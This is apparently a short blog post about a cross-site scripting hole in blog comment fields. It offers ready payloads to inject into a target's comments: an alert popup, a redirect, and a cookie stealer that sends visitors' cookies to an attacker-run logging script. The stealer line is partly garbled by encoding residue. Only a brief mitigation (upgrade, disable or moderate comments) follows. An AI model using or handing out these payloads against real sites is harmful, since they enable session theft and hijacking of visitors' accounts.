Update: It will work only if you are logged in. Sorry for the false alarm. My intention were to alert the bloggers so that they could safeguard their blogs. For more details Click Here
How does it work?
Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection
Popup “alert” Box
<script>alert(‘hungry-hackers.com’)</script>
Redirect to www.hungry-hackers.com
<script>document.location=”http://hungry-hackers.com”</script>
Cookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>
Solution:
Upgrade to the latest version when available, In the meantime disable comments or hold comments for moderation as I did 